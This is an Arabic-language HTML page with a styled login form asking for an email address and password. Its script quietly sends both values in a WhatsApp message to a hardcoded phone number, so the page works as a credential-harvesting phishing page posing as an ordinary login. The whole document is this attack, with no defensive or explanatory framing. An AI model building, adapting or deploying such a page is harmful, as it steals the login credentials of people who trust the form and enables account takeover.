<!DOCTYPE html>
<html lang="ar">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>برنامج</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #fff;
        }
        .container {
            width: 80%;
            margin: 40px auto;
            text-align: center;
        }
        .button {
            background-color: #4CAF50;
            color: #fff;
            padding: 10px 20px;
            border: none;
            border-radius: 5px;
            cursor: pointer;
        }
        .button:hover {
            background-color: #3e8e41;
        }
        .form {
            width: 50%;
            margin: 40px auto;
            padding: 20px;
            border: 1px solid #ccc;
            border-radius: 10px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
        }
        .form input[type="text"], .form input[type="password"] {
            width: 95%;
            padding: 10px;
            margin-bottom: 20px;
            border: 1px solid #ccc;
        }
        .form button[type="submit"] {
            background-color: #4CAF50;
            color: #fff;
            padding: 10px 20px;
            border: none;
            border-radius: 5px;
            cursor: pointer;
        }
        .form button[type="submit"]:hover {
            background-color: #3e8e41;
        }
    </style>
</head>
<body>
    <div class="container">
        <h1 style="font-size: 36px; font-weight: bold;">𝒢𝑜   𝓂𝑒</h1>
        <form class="form" id="myForm">
            <input type="text" id="email" placeholder="البريد الإلكتروني">
            <input type="password" id="password" placeholder="كلمة المرور">
            <button type="submit" class="button">Send</button>
        </form>
    </div>

    <script>
        const form = document.getElementById('myForm');
        form.addEventListener('submit', (e) => {
            e.preventDefault();
            const email = document.getElementById('email').value;
            const password = document.getElementById('password').value;
            const phoneNumber = '201123961290';
            const message = `البريد الإلكتروني: ${email}\nكلمة المرور: ${password}`;
            window.open(`https://api.whatsapp.com/send?phone=${phoneNumber}&text=${message}`, '_blank');
        });
    </script>
</body>
</html>